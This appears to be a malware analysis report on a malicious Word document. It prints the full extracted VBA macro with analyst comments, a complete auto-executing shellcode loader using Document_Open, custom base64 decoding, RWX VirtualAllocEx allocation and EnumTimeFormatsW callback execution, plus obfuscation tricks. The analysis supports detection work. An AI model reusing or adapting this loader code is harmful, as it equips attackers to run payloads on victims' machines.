Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7f978fd65f1924fd…

MALICIOUS

Office (OLE)

165.0 KB Created: 2016-11-16 13:01:00 Authoring application: Microsoft Office Word First seen: 2016-12-03
MD5: 33bed5bcf1fad19097ac94be1821fb2c SHA-1: 393c3ac0b0bb66f156e0bb96b8a3abe660d1c769 SHA-256: 7f978fd65f1924fd66e0c402c4a1269d97e45ca9a96d596c034da08f523f8c08
190 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-1836379. It contains a VBA macro with a Document_Open auto-execution routine, which runs as soon as the document is opened and calls the loader routine `paroxysmal`. The extracted source shows a self-contained shellcode loader rather than a downloader: the loader reads an 8244-character blob from a control on UserForm `potency`, decodes it with a modified base64 routine (each character is offset by 8 before a standard-alphabet lookup), allocates 9770 bytes of RWX memory in the current process via VirtualAllocEx(-1, NULL, 9770, MEM_COMMIT, PAGE_EXECUTE_READWRITE), copies the 6183 decoded bytes into it with RtlMoveMemory, and transfers control by passing the payload address (plus a build-dependent offset, 1280 on 64-bit and 3677 on 32-bit) as the callback argument of EnumTimeFormatsW. No network indicator appears in the macro, and the GetObject call flagged below sits in an unreferenced `UseBookmarks` sub that looks like generic Word-automation filler. The decoded payload itself is not among the extracted artifacts, so its final purpose requires dynamic analysis or manual decoding of the form data.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-1836379 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1836379
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject(, "Word.Application") attaches to the running Word instance. In this sample the call is inside Sub UseBookmarks, which is not invoked from Document_Open or the loader path and resembles a stock Word automation sample, so on its own it is a weak indicator; the malicious logic is in paroxysmal/anabolism/urocystis.
    Matched line in script
        myArray = Array("To", "CC", "From", "Subject")
        Set wdApp = GetObject(, "Word.Application")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    Dim attainable As String
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to the VirtualAlloc API family: the macro declares kernel32!VirtualAllocEx (aliased `abdominal`) and calls it with hProcess = -1 (current process), MEM_COMMIT (4096) and PAGE_EXECUTE_READWRITE (64), i.e. an RWX self-allocation, paired with ntdll!RtlMoveMemory for the copy and an EnumTimeFormatsW callback to start execution.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs listed here are XMP/RDF/Dublin Core namespace identifiers, typical of metadata in an embedded image, and should not be treated as network indicators; the macro source contains no URL at all.
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11899 bytes
SHA-256: 0e7c754f7594dbcba1d4d7b2d34c0ab69ddf52b680014dbbf0faa7e6fd2fcb35
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' [analyst] Auto-exec entry point: fires when the document is opened
' [analyst] (this is what OLE_VBA_DOCOPEN matched). The only statement that
' [analyst] matters is the bare call to paroxysmal, the loader defined below.
' [analyst] Everything else is filler: two unused Dims, a string stored in an
' [analyst] implicit global, and a fixed five-iteration loop that only writes
' [analyst] to the implicit globals cheering and multiply.
Private Sub Document_Open()
Dim attainable As String
Dim concetto As Integer
lucifer = "cheiranthus"
paroxysmal
badinage = 4
While badinage <> 9
badinage = badinage + 1
cheering = Fix(305.89)
multiply = parched
Wend
End Sub
' [analyst] Stage 2 of the loader: allocate RWX memory in the current process
' [analyst] and copy the decoded payload into it. Called from paroxysmal with the
' [analyst] String returned by borodino.anabolism, arriving here inside a Variant.
' [analyst] Returns the address of the copy as a 32-bit Long. Pointers are read and
' [analyst] stored as 4-byte Longs throughout, so on 64-bit Office the addresses
' [analyst] would be truncated -- presumably this only works reliably under 32-bit
' [analyst] Office; confirm dynamically.
Function urocystis(clairvoyance)
Dim tibs As Variant
Dim smuttiness As Long
Dim shortgrass As Long
' [analyst] RtlMoveMemory(&shortgrass, VarPtr(clairvoyance) + 8, 4). Offset 8 of a
' [analyst] VARIANT is its data field (for a VT_BSTR, the pointer to the string
' [analyst] buffer), so shortgrass now holds the address of the decoded payload bytes.
caludicate shortgrass, VarPtr(clairvoyance) + 8, 4
Dim antinomian As String
Dim backyard As Integer
Dim linea As Long
haliotidae = 0
' [analyst] Obfuscated constants: cajolery = -1 (the current-process pseudo-handle),
' [analyst] morello = 0 (lpAddress = NULL, let the OS pick the base).
cajolery = 84 - 116 + 31
morello = 23 + 15 - 26 - 12
multiply = multiply

arrosion = cheering / 496

' [analyst] aerobics = 4096 = MEM_COMMIT; the literal 64 below is PAGE_EXECUTE_READWRITE.
aerobics = 80 + 4016
' [analyst] VirtualAllocEx(-1, NULL, 9770, MEM_COMMIT, PAGE_EXECUTE_READWRITE).
' [analyst] The Declare in module borodino leaves the first two parameters ByRef;
' [analyst] the explicit ByVal at this call site is what makes the call correct.
instigate = abdominal(ByVal cajolery, ByVal morello, 9770, aerobics, 64)
arrosion = Abs(347.549)

' [analyst] Same VARIANT trick on the return value: read the low 4 bytes of the
' [analyst] returned region address out of the implicit Variant 'instigate'.
caludicate linea, VarPtr(instigate) + 8, 4
multiply = "ceratostomataceae"

' [analyst] RtlMoveMemory(region, payload, 6183). 6183 = 8244 encoded chars / 4 * 3,
' [analyst] i.e. exactly the bytes anabolism decodes; the 9770-byte allocation
' [analyst] leaves slack after the copy.
caludicate ByVal linea, shortgrass, 6183
' [analyst] Filler loop: builds throw-away strings that are never read.
For chorister = 11 To 66
dissociation = 66
cheering = Int(108.998)
abarticulation = "bo" & "wer"
abarticulation = LCase$("FA") & Replace("nblaser", "blaser", "g")
Next chorister

' [analyst] Hand the RWX copy's address back; paroxysmal adds an entry offset to it.
urocystis = linea
End Function
' [analyst] Not referenced anywhere in the extracted source. Looks like filler
' [analyst] lifted from a generic Word macro: steps the cursor one character left
' [analyst] when it sits on a table end-of-row marker.
Sub wheresel()
    If Selection.Information(wdAtEndOfRowMarker) = True Then _
        Selection.MoveLeft Unit:=wdCharacter, Count:=1
End Sub

' [analyst] The loader proper, called from Document_Open. Flow:
' [analyst]   1. read the encoded payload from a control on UserForm 'potency'
' [analyst]      (potency.nonpolitical.SelectedItem.Name) and keep its last 8244 chars;
' [analyst]   2. decode it with borodino.anabolism (modified base64 -> raw bytes);
' [analyst]   3. urocystis allocates RWX memory and copies the bytes into it;
' [analyst]   4. execute via the EnumTimeFormatsW callback (alias 'compression'):
' [analyst]      the first argument is lpTimeFmtEnumProc, pointed at payload + offset.
' [analyst] No network activity appears in this routine; the payload ships inside
' [analyst] the form. The many short loops and string concatenations are filler.
Sub paroxysmal()
Dim breechcloth As String
Dim bradshaw As Long
' [analyst] 'potency' is the third module in this project (its VB_Base attribute
' [analyst] carries two GUIDs, as a UserForm's does). 'nonpolitical' is presumably a
' [analyst] control on it whose selected item's Name property holds the encoded
' [analyst] blob -- confirm by inspecting the form's 'o'/'f' streams in the OLE file.
Set coleus = potency.nonpolitical.SelectedItem
isthmus = coleus.Name
' [analyst] Keep only the trailing 8244 characters; anything before is ignored.
dactylorhiza = 8244
troll = Right(isthmus, dactylorhiza)
' [analyst] Decode (see anabolism). The returned String's buffer holds the raw bytes.
memorial = borodino.anabolism(troll)
flimsiness = 5
While flimsiness <> 9
flimsiness = flimsiness + 1
arrosion = arrosion \ 71
parched = "hook"
Wend

metrically = "ecobabble"
' [analyst] Dead branch in both arms: dualism / lineation are declared here but
' [analyst] only lineation is used later.
#If VBA6 And Win64 Then
Dim cydonia As String
Dim dualism As catching
Dim lineation As LongPtr
dualism.start = 119 + 3 - 122
Dim driftage As Variant
#Else
Dim dome As String
dualism = 0
Dim cacophonous As Long
Dim lineation As Long
#End If
scotfree = 0
penetratingly = "expressive"
nonessential = "evacuee"
archenemy = 4096
dangle = 9
While dangle <> 13
dangle = dangle + 1
cheering = Round(266.374)
cheering = Int(323.1247)
Wend

tops = "asynchronous"
banner = "mansi"
For archegonium = 43 To 76
irrigate = 76
parched = multiply
oldish = "li" & "longwe"
oldish = Mid("bimorphemicagoexaltation", 12, 3) & "nizin" & Mid("apothegmglycycadaceae", 9, 3)
Next archegonium

' [analyst] Allocate RWX memory and copy the decoded bytes in; lineation = base address.
alternanthera = memorial
bigot = "babies"
cankerworm = "boats"
lineation = urocystis(alternanthera)
bigshouldered = Replace("aungulata", "ungulata", "gr") & Mid("indeficientostembronze", 12, 5) & LCase$("mA")
winesap = LCase$("In") & Mid("eldoperativeimpermissible", 4, 9)
' [analyst] partisan = entry-point offset into the decoded payload:
' [analyst]   Win64: 9 + 85 + 1186 = 1280;   Win32: (56 + 450) + 3171 = 3677.
' [analyst] Two offsets suggest the blob carries both a 32- and a 64-bit stub.
#If VBA6 And Win64 Then
Dim leptoptilus As Variant
calenture = Mid("aequamcoalstroemeriaceae", 7, 2) & Mid("thatchckscombmercurous", 7, 7)
cumulus = "thi" & "ngumbob"
disappointed = "equibalanced"
partisan = 9 + 85 + 1186
#ElseIf Win32 Then
pierrot = Replace("cobackbencher", "backbencher", "mp") & Mid("accentedassionateirritating", 9, 9)
ecarte = "views"
vitis = "crinoid"
imporosity = 56 + 450
partisan = imporosity + 3171

#End If
Dim regions As Long
Dim disobliging As Variant
Dim dilapidation As Long
' [analyst] dilapidation = 2048 = 0x800 (LOCALE_SYSTEM_DEFAULT), the Locale argument.
dilapidation = 74 + 34 + 1940
Dim hangs As Long
' [analyst] hangs = payload base + offset: the address handed over as the callback.
hangs = lineation + partisan
Dim protractor As Long
' [analyst] protractor = 0 (dwFlags).
protractor = 6 - 6
' [analyst] EnumTimeFormatsW(lpTimeFmtEnumProc = hangs, Locale = 2048, dwFlags = 0).
' [analyst] Windows invokes the "callback" once per time format, which runs the
' [analyst] payload -- API-callback execution instead of CreateThread. A VBA macro
' [analyst] importing EnumTimeFormatsW is itself a good detection opportunity.
adhibit = compression(hangs, dilapidation, protractor)
micron = 7
While micron <> 12
micron = micron + 1
arrosion = cheering * 3
arrosion = Abs(415.286)
Wend

End Sub



Attribute VB_Name = "borodino"
'Maybe I'm crazy
' [analyst] Win32 API imports for module borodino, under obfuscated aliases. Of the
' [analyst] eight names only three are used by the loader (RtlMoveMemory,
' [analyst] VirtualAllocEx, EnumTimeFormatsW); the rest are never called in the
' [analyst] extracted source and several are mis-declared (e.g. Sleep as a Function
' [analyst] without a return type, ByRef handle parameters), which is harmless
' [analyst] because they are dead -- presumably decoys to dilute import heuristics.
' [analyst] The interleaved song-lyric comments are part of the original sample.
#If VBA6 And Win64 Then
'Maybe you're crazy
' [analyst] Used only for a dead 'Dim dualism As catching' in paroxysmal.
Public Type catching
'Come on now, who do you, who do you, who do you, who do you think you are,
start As LongPtr
'And all I remember is thinking, I want to be like them
End Type
'Ha ha ha bless your soul
' [analyst] USED. EnumTimeFormatsW(lpTimeFmtEnumProc, Locale, dwFlags): the first
' [analyst] parameter is a callback pointer, which the loader points at the payload.
Public  Declare PtrSafe Function compression Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal fleece As Any, ByVal lowliness As Any, ByVal groundmass As Any) As LongPtr
'Without care,
' [analyst] unused: OpenClipboard
Public Declare PtrSafe Function lightfooted Lib "user32" Alias "OpenClipboard" (supercharger As LongPtr) As Boolean
'Come on now, who do you, who do you, who do you, who do you think you are,
' [analyst] unused: EndPaint
Public Declare PtrSafe Function connecting Lib "user32" Alias "EndPaint" (abstention As LongPtr,malaysian As LongPtr) As LongPtr
'Maybe we're crazy
' [analyst] USED. RtlMoveMemory(dest, src, len) -- imported from ntdll rather than
' [analyst] the usual kernel32 forwarder; used for pointer reads and the payload copy.
Public  Declare PtrSafe Sub caludicate Lib "ntdll.dll" Alias "RtlMoveMemory" (groundfish As Any, ByVal sententiae As Any, ByVal accountancy As LongPtr)
'And I can die when I'm done
' [analyst] USED. VirtualAllocEx(hProcess, lpAddress, dwSize, flAllocationType,
' [analyst] flProtect). First two parameters are ByRef here; the call site in
' [analyst] urocystis passes them ByVal explicitly.
Public  Declare PtrSafe Function abdominal Lib "kernel32.dll" Alias "VirtualAllocEx" (disbursement As LongPtr, harrowing As LongPtr, ByVal aspersions As LongPtr, ByVal later As LongPtr, ByVal mastigomycota As LongPtr) As LongPtr
'There was something so pleasant about that place.
' [analyst] unused: Sleep
Public Declare PtrSafe Function arithmetician Lib "kernel32.dll" Alias "Sleep" (slurry As LongPtr)
'And it's no coincidence I've come
' [analyst] unused: GetUpdateRect
Public Declare PtrSafe Function cleric Lib "user32" Alias "GetUpdateRect" (bairn As LongPtr, durmast As LongPtr,stack As LongPtr) As Boolean
'Come on now, who do you, who do you, who do you, who do you think you are,
' [analyst] unused: SetParent
Public Declare PtrSafe Function muzzy Lib "user32" Alias "SetParent" (ByVal tink As LongPtr, ByVal rationally As LongPtr,malingering As LongPtr) As LongPtr
'You really think you're in control

'Ha ha ha bless your soul
#Else
' [analyst] 32-bit arm: same three live imports (caludicate, abdominal, compression)
' [analyst] under the same aliases; the decoys get different alias names here.
'And I can die when I'm done
' [analyst] unused: Sleep
Public Declare Function firetrap Lib "kernel32.dll" Alias "Sleep" (barrenness As Long)
'Ha ha ha bless your soul
' [analyst] unused: OpenClipboard
Public Declare Function christsthorn Lib "user32" Alias "OpenClipboard" (demand As Long) As Boolean
'Just like me
' [analyst] USED. RtlMoveMemory(dest, src, len)
Public Declare Sub caludicate Lib "ntdll.dll" Alias "RtlMoveMemory" (chlamys As Any, ByVal monarchal As Any, ByVal jangling As Long)
'And I can die when I'm done
' [analyst] unused: GetUpdateRect
Public Declare Function corradiation Lib "user32" Alias "GetUpdateRect" (obscurum As Long, population As Long, culvert As Long) As Boolean
'Without care,
' [analyst] unused: SetParent
Public Declare Function disraeli Lib "user32" Alias "SetParent" (ByVal amazingly As Long, ByVal asteroidea As Long, amalgamated As Long) As Long
'Yeah, I was out of touch
' [analyst] unused: EndPaint
Public Declare Function winnipeg Lib "user32" Alias "EndPaint" (agricultural As Long, aphrodisia As Long) As Long
'But it wasn't because I didn't know enough
' [analyst] USED. VirtualAllocEx (see 64-bit arm).
Public Declare Function abdominal Lib "kernel32.dll" Alias "VirtualAllocEx" (autodidactic As Long, aedes As Long, ByVal owls As Long, ByVal lordling As Long, ByVal osmerus As Long) As Long
'Maybe you're crazy
' [analyst] USED. EnumTimeFormatsW -- the execution primitive.
Public Declare Function compression Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal acidulate As Any, ByVal megaspore As Any, ByVal brahminical As Any) As Long
'And I hope that you are having the time of your life

'Ha ha ha bless your soul
#End If
'Ever since I was little, ever since I was little it looked like fun
' [analyst] Modified-base64 decoder. amharic is the 8244-character encoded string
' [analyst] taken from the form. Each character has 8 added to it and is then looked
' [analyst] up in a *standard* base64 table, so the embedded text is standard base64
' [analyst] with every character shifted down by 8. Groups of four 6-bit values are
' [analyst] packed into a 24-bit integer and split into three bytes, yielding
' [analyst] 8244 / 4 * 3 = 6183 bytes in bedim (declared 6966 bytes, rest zero).
' [analyst] The Byte array is returned through a String: VBA copies the array into
' [analyst] the string buffer byte-for-byte, so the caller reads the bytes through
' [analyst] the BSTR pointer rather than as characters. The short While/For loops
' [analyst] and string concatenations are filler.
Function anabolism(amharic) As String
arrosion = arrosion Or 472

Dim abortus As Integer
Dim aeneid As Variant

Dim ethnology(63) As Long
Dim blushful As String
Dim ephedra(63) As Long
Dim southwester() As Byte
Dim courtierlike As Long
Dim consanguinity(255) As Byte
Dim apothegmatic As Long
parched = "concetto"

Dim drinkable As Byte

Dim husbandry As Long
Dim fearsomely As Integer

Dim dendroctonus As Long
Dim louisville(63) As Long
' [analyst] Output buffer: 6966 bytes, of which 6183 are written.
Dim bedim(6965) As Byte
' [analyst] Arithmetic-obfuscated constants. Live ones:
' [analyst]   churlishness = 65536 (shift for byte 0), astound = 65280 = 0xFF00,
' [analyst]   roistering = 262144 = 64^3, denunciatory = 64, hauling = 255,
' [analyst]   ambagious = 256, spes = 4096 = 64^2, bachelorship = 16711680 = 0xFF0000.
' [analyst] allars, optical, demoralization and binoculars are never read.
allars = 48 - 88 + 50 + 53
optical = 3 - 6 - 108 + 258159
churlishness = 60 + 98 + 102 + 65276
Dim afrowig As Variant

astound = 101 + 97 + 113 + 64969
roistering = 127 + 82 + 47 + 261888
demoralization = 83 - 19 + 3968
binoculars = 16515072
denunciatory = 64
hauling = 25 - 66 + 88 + 208
ambagious = 256
spes = 94 + 4002
Dim meuse As Variant

bachelorship = 26 + 9 + 16711645
Dim leap As Integer

Dim dixi As Variant
' [analyst] Step 1: copy the 8244 character codes into a Byte array (bossy = 1,
' [analyst] so Mid$ extracts one character at a time; brocket is AscW).
Dim catharacta(8243) As Byte
diluted = 0
entail = 8243
For fungible = diluted To entail
bossy = 49 - 94 + 46
companionable = Mid$(amharic, fungible + 1, bossy)
autocratic = "butuminous"
archaeological = "phonogram"
tenaculum = brocket(companionable)
catharacta(fungible) = tenaculum
Next
Dim tristan As String
jamb = 2
While jamb <> 5
jamb = jamb + 1
parched = "gynaeocracy"
cheering = Abs(188.109)
Wend

' [analyst] Step 2: undo the alphabet shift -- add 8 to every byte so that the
' [analyst] standard base64 lookup below applies.
balsam = 8243
bouteloua = 35
For millstone = 0 To balsam
catharacta(millstone) = catharacta(millstone) + 8
Next millstone
algology = 9
While algology <> 14
algology = algology + 1
arrosion = arrosion + 339
cheering = Round(303.726)
Wend

' [analyst] Step 3: build the standard base64 reverse table:
' [analyst]   'A'-'Z' -> 0..25, 'a'-'z' -> 26..51, '0'-'9' -> 52..61, '+' -> 62, '/' -> 63.
abortus = 0
cobbler = 18 + 110 - 6
grapes = 255
For apothegmatic = 0 To grapes
If (apothegmatic >= 65) And (apothegmatic <= 90) Then
consanguinity(apothegmatic) = apothegmatic - 65
ElseIf (apothegmatic >= 97) And (apothegmatic <= 122) Then
consanguinity(apothegmatic) = apothegmatic - 71
ElseIf (apothegmatic >= 48) And (apothegmatic <= 57) Then
consanguinity(apothegmatic) = apothegmatic + 4
ElseIf apothegmatic = 43 Then
consanguinity(apothegmatic) = 62
ElseIf apothegmatic = 47 Then
consanguinity(apothegmatic) = 63
End If
Next apothegmatic
' [analyst] Multiplier tables (jamming is plain multiplication):
' [analyst]   louisville(i) = i*64, ephedra(i) = i*4096, ethnology(i) = i*262144.
For apothegmatic = 0 To 63
louisville(apothegmatic) = jamming(apothegmatic, denunciatory)
ephedra(apothegmatic) = jamming(apothegmatic, spes)
ethnology(apothegmatic) = jamming(apothegmatic, roistering)
Next apothegmatic
mel = 7
While mel <> 12
mel = mel + 1
arrosion = arrosion - 292
parched = multiply
Wend

southwester = catharacta
fashions = 4
For tenoroon = 45 To 50
overloook = 50
arrosion = Fix(307.464)
buna = Replace("aclanking", "clanking", "s") & "arab" & LCase$("AccA")
buna = "blo" & Mid("cravingodstaconstricted", 8, 5) & "in"
Next tenoroon

' [analyst] nervousness = 3 (index of the 4th char in each group); trousseau = 2.
nervousness = 95 - 92
multiply = multiply

cheering = Int(450.224)

aliquot = nervousness + 1
trousseau = 2
' [analyst] Step 4: for each group of four characters (the loop body adds 3 and
' [analyst] Next adds 1, so the step is 4) form
' [analyst]   v = s0*64^3 + s1*64^2 + s2*64 + s3
' [analyst] and emit (v And 0xFF0000) \ 65536, (v And 0xFF00) \ 256, v And 0xFF
' [analyst] (pen = And, assai = integer division). husbandry advances by 3.
For dendroctonus = 0 To balsam
freund = southwester(dendroctonus)
merida = southwester(dendroctonus + 2)
courtierlike = ethnology(consanguinity(freund)) _
 + ephedra(consanguinity(southwester(dendroctonus + 1))) + louisville(consanguinity(merida)) + consanguinity(southwester(dendroctonus + nervousness))
apothegmatic = pen(courtierlike, bachelorship)
bedim(husbandry) = assai(apothegmatic, churlishness)
apothegmatic = pen(courtierlike, astound)
bedim(husbandry + 1) = assai(apothegmatic, ambagious)
bedim(husbandry + trousseau) = pen(courtierlike, hauling)
husbandry = husbandry + trousseau + 1
dendroctonus = dendroctonus + 3
Next
' [analyst] Byte array -> String: the decoded bytes become the string's raw buffer.
anabolism = bedim
End Function

' [analyst] Trivial wrapper: returns platyctenean * tram. Used by anabolism to
' [analyst] build its 64^n multiplier tables; the indirection only obscures the math.
Function jamming(platyctenean, tram)
jamming = platyctenean * tram
End Function
' [analyst] Trivial wrapper: bitwise And of the two arguments. anabolism uses it
' [analyst] with the masks 0xFF0000, 0xFF00 and 0xFF to extract bytes.
Function pen(consent, contentedly)
pen = consent And contentedly
End Function
' [analyst] Trivial wrapper: Unicode character code of the first character
' [analyst] (AscW). anabolism calls it per character of the encoded blob.
Function brocket(calliphora)
brocket = AscW(calliphora)
End Function
' [analyst] Not called from Document_Open or anywhere else in the extracted source.
' [analyst] It attaches to the running Word instance via GetObject -- the line that
' [analyst] triggered OLE_VBA_GETOBJ -- and prefixes four bookmarks with single
' [analyst] letters. It reads like a stock Word-automation sample pasted in as
' [analyst] filler; treat the GetObject hit as low-confidence on its own.
Sub UseBookmarks()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

' [analyst] Trivial wrapper: integer division (\). anabolism uses it with 65536
' [analyst] and 256 to shift masked 24-bit values down into single bytes.
Function assai(asclepiad, compressible)
assai = asclepiad \ compressible
End Function


Attribute VB_Name = "potency"
Attribute VB_Base = "0{FA53A92D-C0A8-41D5-A645-E7C2021CE203}{E879FCAD-6250-43B7-89C9-932167856A4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False